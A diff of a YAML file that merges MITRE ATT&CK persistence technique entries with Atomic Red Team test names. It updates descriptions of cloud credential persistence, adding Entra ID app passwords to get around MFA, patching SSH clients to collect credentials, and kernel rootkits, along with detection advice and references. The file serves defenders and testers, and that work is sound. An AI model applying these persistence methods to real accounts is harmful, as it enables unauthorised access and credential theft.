         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -65706,11 +66101,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -65721,12 +66120,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -65735,6 +66141,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -65743,13 +66150,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -65775,10 +66185,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -65787,10 +66205,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -65807,9 +66235,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests:
     - name: Azure AD Application Hijacking - Service Principal
@@ -65990,7 +66415,7 @@ persistence:
         name: sh
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -66065,7 +66490,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -66154,7 +66578,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests:
     - name: Persistence via WMI Event Subscription - CommandLineEventConsumer
@@ -66292,19 +66715,23 @@ persistence:
         name: powershell
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -66318,7 +66745,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -66333,6 +66760,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -66346,11 +66778,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -66376,7 +66807,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -66390,7 +66820,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -66417,8 +66846,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -66429,7 +66858,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests:
     - name: Change Default File Association
@@ -66499,7 +66929,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -66519,7 +66949,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests:
     - name: Persistance with Event Monitor - emond
@@ -66546,7 +66975,7 @@ persistence:
         elevation_required: true
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -66600,11 +67029,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -66691,9 +67119,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -66706,7 +67134,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests:
     - name: Reg Key Run
@@ -67140,7 +67567,7 @@ persistence:
         elevation_required: true
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -67153,9 +67580,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -67164,13 +67593,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -67218,9 +67647,6 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests:
     - name: AWS - Create a new IAM user
@@ -67349,7 +67775,7 @@ persistence:
         name: powershell
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -67385,16 +67811,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -67435,7 +67860,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Admin Account Manipulate
@@ -68428,138 +68852,137 @@ persistence:
           terraform apply -auto-approve
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
